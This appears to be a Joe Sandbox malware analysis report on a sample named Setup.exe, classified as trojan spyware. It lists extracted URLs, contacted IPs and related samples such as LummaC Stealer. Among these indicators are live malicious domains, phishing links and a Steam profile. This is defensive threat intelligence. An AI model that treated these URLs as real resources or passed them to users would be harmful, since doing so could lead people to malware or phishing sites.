https://klipcatepiu0.shop/int_clp_ldr_sha.txtL	Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://anglebug.com/4551Q	chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199680660089d	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858148873.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://anglebug.com/3862	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000002.00000003.1915166528.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1920939536.0000620400E7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918800969.0000620400ED4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/tools/feedback/chrome/__submitb	chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5421F	chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199680660089/inventory/	Setup.exe, 00000000.00000003.1834175101.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1858083111.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://broadcast.st.dl.eccdnx.com	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://anglebug.com/3970	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp, chromecache_73.6.dr, chromecache_76.6.dr	false		high
https://steamcommunity.com/workshop/	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916945926.00006204010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916921151.0000620401060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916877024.0000620400F74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918204826.0000620400794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917175520.000062040107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918256122.0000620400FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918223939.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1917099128.0000620400F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939482052.00006204002A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjce	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://anglebug.com/5901	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://anglebug.com/7161	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://lens.google.com/v3/upload	chrome.exe, 00000002.00000003.1905063132.0000298C006F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904972257.0000298C006F0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3832	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000002.00000003.1935679655.00006204002B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199680660089L	Setup.exe, 00000000.00000003.1858148873.0000000000A72000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://api.steampowered.com/	Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://lens.google.com/upload	chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6651N	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6651	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/4830	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ras2.shop/Up;	Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://dl.google.com/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjdbkj	chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejginpbo	chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199680660089/badges	Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	false		high
http://anglebug.com/2162	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941515657.000062040068C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5430	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2091451584.0000620400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944082274.0000620400B8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore206E5	chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkh	chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3498	chrome.exe, 00000002.00000003.1912584033.00006204003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thir	chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkehgbn	chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
104.21.2.114	ras2.shop	United States	13335	CLOUDFLARENETUS	true
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
142.250.181.78	plus.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581482
Start date and time:	2024-12-27 21:19:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Setup.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@29/25@8/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 45 Number of non-executed functions: 220
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.64.59.136, 192.229.221.95, 172.217.21.35, 172.217.19.238, 173.194.220.84, 172.217.17.46, 142.250.181.99, 142.250.181.42, 142.250.181.74, 142.250.181.106, 142.250.181.138, 172.217.17.42, 172.217.19.234, 172.217.19.202, 172.217.19.170, 172.217.19.10, 172.217.21.42, 172.217.17.74, 216.58.208.234, 52.168.117.173, 13.89.179.12, 172.217.17.35, 52.182.143.212, 172.217.19.206, 142.250.181.142, 20.109.210.53, 20.190.177.148, 23.218.208.109, 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): clients1.google.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
15:20:57	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	http://proxyium.com	Get hash	malicious	Unknown	Browse
	https://cbhc9.anguatiab.ru/RpweC/	Get hash	malicious	Unknown	Browse
	https://greensofttech1-my.sharepoint.com/:f:/g/personal/stella_huang_greensofttech1_onmicrosoft_com/EuOSopXBEUpFhaHAwqFRDM8BeWLY-Gsl0U9Az2fOy4x80A?e=GhPegT&xsdata=MDV8MDJ8TVB1Z2FAaHljaXRlLmNvbXxjMDM5NmJhZjcxOTM0YzBkMTc3ZDA4ZGQxMzcwNWQ3MnxmYzVjNjhmNjk3ZjM0ZWZlYjY4OWViNWMxMjM0ZjgyMXwwfDB8NjM4Njg4MDk1NTQ0NTA0NzA2fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=SVpsejJNYUlwY213VjNreGxSNU1LaFJXcnpXS3pwWjhYR2k5ZUthLzlsMD0%3d	Get hash	malicious	HTMLPhisher	Browse
	http://bitstampweb.0532tg.com	Get hash	malicious	Unknown	Browse
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse
	http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u	Get hash	malicious	HTMLPhisher	Browse
	http://resources.onestart.ai/onestart_installer_130.0.6723.134.exe	Get hash	malicious	Unknown	Browse
	http://resources.onestart.ai/onestart_installer_130.0.6723.134.exe	Get hash	malicious	Unknown	Browse
	https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.pt	Get hash	malicious	Unknown	Browse
	https://franoapas.co.in/	Get hash	malicious	Unknown	Browse
23.55.153.106	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse
	z3IxCpcpg4.exe	Get hash	malicious	LummaC	Browse
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse
	AiaStwRBdI.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
play.google.com	http://tubnzy3uvz.top/1.php?s=527	Get hash	malicious	Unknown	Browse	172.217.19.238
	http://poubnxu3jubz.top/1.php	Get hash	malicious	Unknown	Browse	172.217.19.238
	http://poubnxu3jubz.top/1.php	Get hash	malicious	Unknown	Browse	172.217.19.238
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.217.19.206
	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	172.217.19.238
